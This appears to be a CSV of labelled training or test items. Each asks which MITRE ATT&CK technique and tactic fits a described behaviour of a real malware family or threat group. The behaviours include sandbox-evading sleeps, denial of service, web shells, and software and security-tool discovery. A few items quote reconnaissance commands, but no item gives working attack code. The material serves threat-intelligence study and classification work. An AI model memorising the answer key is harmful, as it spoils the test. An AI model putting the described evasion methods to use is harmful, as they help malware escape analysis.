+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: GuLoader has the ability to perform anti-debugging based on time checks, API calls, and CPUID.","Tecnique: T1497.003 Virtualization/Sandbox Evasion: Time Based Evasion, Tactic: TA0005 Defense Evasion TA0007 Discovery "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HermeticWiper has the ability to receive a command parameter to sleep prior to carrying out destructive actions on a targeted host.,"Tecnique: T1497.003 Virtualization/Sandbox Evasion: Time Based Evasion, Tactic: TA0005 Defense Evasion TA0007 Discovery "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LiteDuke can wait 30 seconds before executing additional code if security software is detected.,"Tecnique: T1497.003 Virtualization/Sandbox Evasion: Time Based Evasion, Tactic: TA0005 Defense Evasion TA0007 Discovery "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Lokibot has performed a time-based anti-debug check before downloading its third stage.,"Tecnique: T1497.003 Virtualization/Sandbox Evasion: Time Based Evasion, Tactic: TA0005 Defense Evasion TA0007 Discovery "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Okrum's loader can detect presence of an emulator by using two calls to GetTickCount API, and checking whether the time has been accelerated.","Tecnique: T1497.003 Virtualization/Sandbox Evasion: Time Based Evasion, Tactic: TA0005 Defense Evasion TA0007 Discovery "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: P8RAT has the ability to ""sleep"" for a specified time to evade detection.","Tecnique: T1497.003 Virtualization/Sandbox Evasion: Time Based Evasion, Tactic: TA0005 Defense Evasion TA0007 Discovery "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Pony has delayed execution using a built-in function to avoid detection and analysis.,"Tecnique: T1497.003 Virtualization/Sandbox Evasion: Time Based Evasion, Tactic: TA0005 Defense Evasion TA0007 Discovery "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: The QakBot dropper can delay dropping the payload to evade detection.,"Tecnique: T1497.003 Virtualization/Sandbox Evasion: Time Based Evasion, Tactic: TA0005 Defense Evasion TA0007 Discovery "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: After initial installation, Raindrop runs a computation to delay execution.","Tecnique: T1497.003 Virtualization/Sandbox Evasion: Time Based Evasion, Tactic: TA0005 Defense Evasion TA0007 Discovery "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SUNBURST remained dormant after initial access for a period of up to two weeks.,"Tecnique: T1497.003 Virtualization/Sandbox Evasion: Time Based Evasion, Tactic: TA0005 Defense Evasion TA0007 Discovery "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SVCReady can enter a sleep stage for 30 minutes to evade detection.,"Tecnique: T1497.003 Virtualization/Sandbox Evasion: Time Based Evasion, Tactic: TA0005 Defense Evasion TA0007 Discovery "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Saint Bot has used the command `timeout 20` to pause the execution of its initial loader.,"Tecnique: T1497.003 Virtualization/Sandbox Evasion: Time Based Evasion, Tactic: TA0005 Defense Evasion TA0007 Discovery "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Snip3 can execute `WScript.Sleep` to delay execution of its second stage.,"Tecnique: T1497.003 Virtualization/Sandbox Evasion: Time Based Evasion, Tactic: TA0005 Defense Evasion TA0007 Discovery "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SodaMaster has the ability to put itself to ""sleep"" for a specified time.","Tecnique: T1497.003 Virtualization/Sandbox Evasion: Time Based Evasion, Tactic: TA0005 Defense Evasion TA0007 Discovery "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: StrifeWater can modify its sleep time responses from the default of 20-22 seconds.,"Tecnique: T1497.003 Virtualization/Sandbox Evasion: Time Based Evasion, Tactic: TA0005 Defense Evasion TA0007 Discovery "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ThiefQuest invokes time call to check the system's time, executes a sleep command, invokes a second time call, and then compares the time difference between the two time calls and the amount of time the system slept to identify the sandbox.","Tecnique: T1497.003 Virtualization/Sandbox Evasion: Time Based Evasion, Tactic: TA0005 Defense Evasion TA0007 Discovery "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Tomiris has the ability to sleep for at least nine minutes to evade sandbox-based analysis systems.,"Tecnique: T1497.003 Virtualization/Sandbox Evasion: Time Based Evasion, Tactic: TA0005 Defense Evasion TA0007 Discovery "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TrickBot has used printf and file I/O loops to delay process execution as part of API hammering.,"Tecnique: T1497.003 Virtualization/Sandbox Evasion: Time Based Evasion, Tactic: TA0005 Defense Evasion TA0007 Discovery "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ursnif has used a 30 minute delay after execution to evade sandbox monitoring tools.,"Tecnique: T1497.003 Virtualization/Sandbox Evasion: Time Based Evasion, Tactic: TA0005 Defense Evasion TA0007 Discovery "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WhisperGate can pause for 20 seconds to bypass antivirus solutions.,"Tecnique: T1497.003 Virtualization/Sandbox Evasion: Time Based Evasion, Tactic: TA0005 Defense Evasion TA0007 Discovery "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Using the machine's local time, XCSSET waits 43200 seconds (12 hours) from the initial creation timestamp of a specific file, .report. After the elapsed time, XCSSET executes additional modules.","Tecnique: T1497.003 Virtualization/Sandbox Evasion: Time Based Evasion, Tactic: TA0005 Defense Evasion TA0007 Discovery "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: metaMain has delayed execution for five to six minutes during its persistence establishment process.,"Tecnique: T1497.003 Virtualization/Sandbox Evasion: Time Based Evasion, Tactic: TA0005 Defense Evasion TA0007 Discovery "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: In 2016, APT28 conducted a distributed denial of service (DDoS) attack against the World Anti-Doping Agency.","Tecnique: T1498 Network Denial of Service, Tactic: TA0040 Impact"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Lucifer can execute TCP, UDP, and HTTP denial of service (DoS) attacks.","Tecnique: T1498 Network Denial of Service, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: NKAbuse enables multiple types of network denial of service capabilities across several protocols post-installation.,"Tecnique: T1498 Network Denial of Service, Tactic: TA0040 Impact"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sandworm Team temporarily disrupted service to Georgian government, non-government, and private sector websites after compromising a Georgian web hosting provider in 2019.","Tecnique: T1499 Endpoint Denial of Service, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: OnionDuke has the capability to use a Denial of Service module.,"Tecnique: T1499 Endpoint Denial of Service, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ZxShell has a feature to perform SYN flood attack on a host.,"Tecnique: T1499 Endpoint Denial of Service, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Industroyer uses a custom DoS tool that leverages CVE-2015-5374 and targets hardcoded IP addresses of Siemens SIPROTEC devices.,"Tecnique: T1499.004 Endpoint Denial of Service: Application or System Exploitation, Tactic: TA0040 Impact"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During the 2016 Ukraine Electric Power Attack, Sandworm Team used various MS-SQL stored procedures.","Tecnique: T1505.001 Server Software Component: SQL Stored Procedures, Tactic: TA0003 Persistence"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Stuxnet used xp_cmdshell to store and execute SQL code.,"Tecnique: T1505.001 Server Software Component: SQL Stored Procedures, Tactic: TA0003 Persistence"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LightNeuron has used a malicious Microsoft Exchange transport agent for persistence.,"Tecnique: T1505.002 Server Software Component: Transport Agent, Tactic: TA0003 Persistence"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During the 2022 Ukraine Electric Power Attack, Sandworm Team deployed the Neo-REGEORG webshell on an internet-facing server.","Tecnique: T1505.003 Server Software Component: Web Shell, Tactic: TA0003 Persistence"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During C0017, APT41 deployed JScript web shells through the creation of malicious ViewState objects.","Tecnique: T1505.003 Server Software Component: Web Shell, Tactic: TA0003 Persistence"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During the C0032 campaign, TEMP.Veles planted Web shells on Outlook Exchange servers.","Tecnique: T1505.003 Server Software Component: Web Shell, Tactic: TA0003 Persistence"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Cutting Edge, threat actors used multiple web shells to maintain presence on compromised Connect Secure appliances such as WIREFIRE, GLASSTOKEN, BUSHWALK, LIGHTWIRE, and FRAMESTING.","Tecnique: T1505.003 Server Software Component: Web Shell, Tactic: TA0003 Persistence"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation CuckooBees, the threat actors generated a web shell within a vulnerable Enterprise Resource Planning Web Application Server as a persistence mechanism.","Tecnique: T1505.003 Server Software Component: Web Shell, Tactic: TA0003 Persistence"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Wocao, threat actors used their own web shells, as well as those previously placed on target systems by other threat actors, for reconnaissance and lateral movement.","Tecnique: T1505.003 Server Software Component: Web Shell, Tactic: TA0003 Persistence"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT28 has used a modified and obfuscated version of the reGeorg web shell to maintain persistence on a target's Outlook Web Access (OWA) server.,"Tecnique: T1505.003 Server Software Component: Web Shell, Tactic: TA0003 Persistence"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT29 has installed web shells on exploited Microsoft Exchange servers.,"Tecnique: T1505.003 Server Software Component: Web Shell, Tactic: TA0003 Persistence"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT32 has used Web shells to maintain access to victim websites.,"Tecnique: T1505.003 Server Software Component: Web Shell, Tactic: TA0003 Persistence"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT38 has used web shells for persistence or to ensure redundant access.,"Tecnique: T1505.003 Server Software Component: Web Shell, Tactic: TA0003 Persistence"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT39 has installed ANTAK and ASPXSPY web shells.,"Tecnique: T1505.003 Server Software Component: Web Shell, Tactic: TA0003 Persistence"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT5 has installed multiple web shells on compromised servers including on Pulse Secure VPN appliances.,"Tecnique: T1505.003 Server Software Component: Web Shell, Tactic: TA0003 Persistence"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BackdoorDiplomacy has used web shells to establish an initial foothold and for lateral movement within a victim's system.,"Tecnique: T1505.003 Server Software Component: Web Shell, Tactic: TA0003 Persistence"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Deep Panda uses Web shells on publicly accessible Web servers to access victim networks.,"Tecnique: T1505.003 Server Software Component: Web Shell, Tactic: TA0003 Persistence"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Dragonfly has commonly created Web shells on victims' publicly accessible email and web servers, which they used to maintain access to a victim network and download additional malicious files.","Tecnique: T1505.003 Server Software Component: Web Shell, Tactic: TA0003 Persistence"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN13 has utilized obfuscated and open-source web shells such as JspSpy, reGeorg, MiniWebCmdShell, and Vonloesch Jsp File Browser 1.2 to enable remote code execution and to execute commands on compromised web server.","Tecnique: T1505.003 Server Software Component: Web Shell, Tactic: TA0003 Persistence"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Fox Kitten has installed web shells on compromised hosts to maintain access.,"Tecnique: T1505.003 Server Software Component: Web Shell, Tactic: TA0003 Persistence"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: GALLIUM used Web shells to persist in victim environments and assist in execution and exfiltration.,"Tecnique: T1505.003 Server Software Component: Web Shell, Tactic: TA0003 Persistence"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HAFNIUM has deployed multiple web shells on compromised servers including SIMPLESEESHARP, SPORTSBALL, China Chopper, and ASPXSpy.","Tecnique: T1505.003 Server Software Component: Web Shell, Tactic: TA0003 Persistence"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kimsuky has used modified versions of open source PHP web shells to maintain access, often adding ""Dinosaur"" references within the code.","Tecnique: T1505.003 Server Software Component: Web Shell, Tactic: TA0003 Persistence"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Leviathan relies on web shells for an initial foothold as well as persistence into the victim's systems.,"Tecnique: T1505.003 Server Software Component: Web Shell, Tactic: TA0003 Persistence"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Magic Hound has used multiple web shells to gain execution.,"Tecnique: T1505.003 Server Software Component: Web Shell, Tactic: TA0003 Persistence"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Moses Staff has dropped a web shell onto a compromised system.,"Tecnique: T1505.003 Server Software Component: Web Shell, Tactic: TA0003 Persistence"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: OilRig has used web shells, often to maintain access to a victim network.","Tecnique: T1505.003 Server Software Component: Web Shell, Tactic: TA0003 Persistence"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sandworm Team has used webshells including P.A.S. Webshell to maintain access to victim networks.,"Tecnique: T1505.003 Server Software Component: Web Shell, Tactic: TA0003 Persistence"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Threat Group-3390 has used a variety of Web shells.,"Tecnique: T1505.003 Server Software Component: Web Shell, Tactic: TA0003 Persistence"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Tonto Team has used a first stage web shell after compromising a vulnerable Exchange server.,"Tecnique: T1505.003 Server Software Component: Web Shell, Tactic: TA0003 Persistence"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Tropic Trooper has started a web service in the target host and wait for the adversary to connect, acting as a web shell.","Tecnique: T1505.003 Server Software Component: Web Shell, Tactic: TA0003 Persistence"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Volatile Cedar can inject web shell code into a server.,"Tecnique: T1505.003 Server Software Component: Web Shell, Tactic: TA0003 Persistence"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Volt Typhoon has used webshells, including ones named AuditReport.jspx and iisstart.aspx, in compromised environments.","Tecnique: T1505.003 Server Software Component: Web Shell, Tactic: TA0003 Persistence"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ASPXSpy is a Web shell. The ASPXTool version used by Threat Group-3390 has been deployed to accessible servers running Internet Information Services (IIS).,"Tecnique: T1505.003 Server Software Component: Web Shell, Tactic: TA0003 Persistence"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BUSHWALK is a web shell that has the ability to execute arbitrary commands or write files.,"Tecnique: T1505.003 Server Software Component: Web Shell, Tactic: TA0003 Persistence"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: China Chopper's server component is a Web Shell payload.,"Tecnique: T1505.003 Server Software Component: Web Shell, Tactic: TA0003 Persistence"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FRAMESTING is a web shell capable of enabling arbitrary command execution on compromised Ivanti Connect Secure VPNs.,"Tecnique: T1505.003 Server Software Component: Web Shell, Tactic: TA0003 Persistence"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: GLASSTOKEN is a web shell capable of tunneling C2 connections and code execution on compromised Ivanti Secure Connect VPNs.,"Tecnique: T1505.003 Server Software Component: Web Shell, Tactic: TA0003 Persistence"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LIGHTWIRE is a web shell capable of command execution and establishing persistence on compromised Ivanti Secure Connect VPNs.,"Tecnique: T1505.003 Server Software Component: Web Shell, Tactic: TA0003 Persistence"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: OwaAuth is a Web shell that appears to be exclusively used by Threat Group-3390. It is installed as an ISAPI filter on Exchange servers and shares characteristics with the China Chopper Web shell.,"Tecnique: T1505.003 Server Software Component: Web Shell, Tactic: TA0003 Persistence"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: P.A.S. Webshell can gain remote access and execution on target web servers.,"Tecnique: T1505.003 Server Software Component: Web Shell, Tactic: TA0003 Persistence"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PULSECHECK is a web shell that can enable command execution on compromised servers.,"Tecnique: T1505.003 Server Software Component: Web Shell, Tactic: TA0003 Persistence"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RAPIDPULSE is a web shell that is capable of arbitrary file read on targeted web servers to exfiltrate items of interest on the victim device.,"Tecnique: T1505.003 Server Software Component: Web Shell, Tactic: TA0003 Persistence"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SEASHARPEE is a Web shell.,"Tecnique: T1505.003 Server Software Component: Web Shell, Tactic: TA0003 Persistence"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SLIGHTPULSE is a web shell that can read, write, and execute files on compromised servers.","Tecnique: T1505.003 Server Software Component: Web Shell, Tactic: TA0003 Persistence"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: STEADYPULSE is a web shell that can enable the execution of arbitrary commands on compromised web servers.,"Tecnique: T1505.003 Server Software Component: Web Shell, Tactic: TA0003 Persistence"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SUPERNOVA is a Web shell.,"Tecnique: T1505.003 Server Software Component: Web Shell, Tactic: TA0003 Persistence"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WIREFIRE is a web shell that can download files to and execute arbitrary commands from compromised Ivanti Connect Secure VPNs.,"Tecnique: T1505.003 Server Software Component: Web Shell, Tactic: TA0003 Persistence"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Dream Job, Lazarus Group targeted Windows servers running Internet Information Systems (IIS) to install C2 components.","Tecnique: T1505.004 Server Software Component: IIS Components, Tactic: TA0003 Persistence"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: IceApple is an IIS post-exploitation framework, consisting of 18 modules that provide several functionalities.","Tecnique: T1505.004 Server Software Component: IIS Components, Tactic: TA0003 Persistence"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: OwaAuth has been loaded onto Exchange servers and disguised as an ISAPI filter (owaauth.dll). The IIS w3wp.exe process then loads the malicious DLL.,"Tecnique: T1505.004 Server Software Component: IIS Components, Tactic: TA0003 Persistence"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RGDoor establishes persistence on webservers as an IIS module.,"Tecnique: T1505.004 Server Software Component: IIS Components, Tactic: TA0003 Persistence"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Dust Storm, the threat actors deployed a file called `DeployJava.js` to fingerprint installed software on a victim system prior to exploit delivery.","Tecnique: T1518 Software Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Wocao, threat actors collected a list of installed software on the infected system.","Tecnique: T1518 Software Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BRONZE BUTLER has used tools to enumerate software installed on an infected host.,"Tecnique: T1518 Software Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HEXANE has enumerated programs installed on an infected machine.,"Tecnique: T1518 Software Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Inception has enumerated installed software on compromised systems.,"Tecnique: T1518 Software Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MuddyWater has used a PowerShell backdoor to check for Skype connectivity on the target machine.,"Tecnique: T1518 Software Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mustang Panda has searched the victim system for the InstallUtil.exe program and its version.,"Tecnique: T1518 Software Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SideCopy has collected browser information from a compromised host.,"Tecnique: T1518 Software Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sidewinder has used tools to enumerate software installed on an infected host.,"Tecnique: T1518 Software Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Tropic Trooper's backdoor could list the infected system's installed software.,"Tecnique: T1518 Software Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Volt Typhoon has queried the Registry on compromised systems for information on installed software.,"Tecnique: T1518 Software Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Windigo has used a script to detect installed software on targeted systems.,"Tecnique: T1518 Software Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Windshift has used malware to identify installed software.,"Tecnique: T1518 Software Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Wizard Spider has utilized the PowerShell script `Get-DataInfo.ps1` to collect installed backup software information from a compromised machine.,"Tecnique: T1518 Software Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bazar can query the Registry for installed applications.,"Tecnique: T1518 Software Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bundlore has the ability to enumerate what browser is being used as well as version information for Safari.,"Tecnique: T1518 Software Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CharmPower can list the installed applications on a compromised host.,"Tecnique: T1518 Software Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: The Cobalt Strike System Profiler can discover applications through the browser and identify the version of Java the target has.,"Tecnique: T1518 Software Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ComRAT can check the victim's default browser to determine which process to inject its communications module into.,"Tecnique: T1518 Software Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Dridex has collected a list of installed software on the system.,"Tecnique: T1518 Software Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DustySky lists all installed software for the infected machine.,"Tecnique: T1518 Software Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Dyre has the ability to identify installed programs on a compromised host.,"Tecnique: T1518 Software Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HotCroissant can retrieve a list of applications from the SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths registry key.,"Tecnique: T1518 Software Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: InvisiMole can collect information about installed software used by specific users, software executed on user login, and software executed by each system.","Tecnique: T1518 Software Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: KGH_SPY can collect information on installed applications.,"Tecnique: T1518 Software Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MarkiRAT can check for the Telegram installation directory by enumerating the files on disk.,"Tecnique: T1518 Software Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Metamorfo has searched the compromised system for banking applications.,"Tecnique: T1518 Software Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Orz can gather the victim's Internet Explorer version.,"Tecnique: T1518 Software Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: P.A.S. Webshell can list PHP server configuration details.,"Tecnique: T1518 Software Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: QakBot can enumerate a list of installed programs.,"Tecnique: T1518 Software Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RTM can scan victim drives to look for specific banking software on the machine to determine next actions.,"Tecnique: T1518 Software Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SUGARDUMP can identify Chrome, Opera, Edge Chromium, and Firefox browsers, including version number, on a compromised host.","Tecnique: T1518 Software Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SVCReady can collect a list of installed software from an infected host.,"Tecnique: T1518 Software Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Samurai can check for the presence and version of the .NET framework.,"Tecnique: T1518 Software Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ShimRatReporter gathered a list of installed software on the infected host.,"Tecnique: T1518 Software Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Siloscape searches for the kubectl binary.,"Tecnique: T1518 Software Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SocGholish can identify the victim's browser in order to serve the correct fake update page.,"Tecnique: T1518 Software Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SpicyOmelette can enumerate running software on a targeted system.,"Tecnique: T1518 Software Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TajMahal has the ability to identify the Internet Explorer (IE) version on an infected host.,"Tecnique: T1518 Software Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Woody RAT can collect .NET, PowerShell, and Python information from an infected host.","Tecnique: T1518 Software Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: XCSSET uses ps aux with the grep command to enumerate common browsers and system processes potentially impacting XCSSET's exfiltration capabilities.,"Tecnique: T1518 Software Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: down_new has the ability to gather information on installed applications.,"Tecnique: T1518 Software Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Frankenstein, the threat actors used WMI queries to determine if analysis tools were running on a compromised system.","Tecnique: T1518.001 Software Discovery: Security Software Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Wocao, threat actors used scripts to detect security software.","Tecnique: T1518.001 Software Discovery: Security Software Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT38 has identified security software, configurations, defensive tools, and sensors installed on a compromised system.","Tecnique: T1518.001 Software Discovery: Security Software Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Aquatic Panda has attempted to discover third party endpoint detection and response (EDR) tools on compromised systems.,"Tecnique: T1518.001 Software Discovery: Security Software Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cobalt Group used a JavaScript backdoor that is capable of collecting a list of the security solutions installed on the victim's machine.,"Tecnique: T1518.001 Software Discovery: Security Software Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Darkhotel has searched for anti-malware strings and anti-virus processes running on the system.,"Tecnique: T1518.001 Software Discovery: Security Software Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN8 has used Registry keys to detect and avoid executing in potential sandboxes.,"Tecnique: T1518.001 Software Discovery: Security Software Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kimsuky has checked for the presence of antivirus software with powershell Get-CimInstance -Namespace root/securityCenter2 – classname antivirusproduct.,"Tecnique: T1518.001 Software Discovery: Security Software Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Malteiro collects the installed antivirus on the victim machine.,"Tecnique: T1518.001 Software Discovery: Security Software Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MuddyWater has used malware to check running processes against a hard-coded list of security tools often used by malware researchers.,"Tecnique: T1518.001 Software Discovery: Security Software Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Naikon uses commands such as netsh advfirewall firewall to discover local firewall settings.,"Tecnique: T1518.001 Software Discovery: Security Software Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Patchwork scanned the “Program Files” directories for a directory with the string “Total Security” (the installation path of the “360 Total Security” antivirus tool).,"Tecnique: T1518.001 Software Discovery: Security Software Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Rocke used scripts which detected and uninstalled antivirus software.,"Tecnique: T1518.001 Software Discovery: Security Software Discovery, Tactic: TA0007 Discovery"
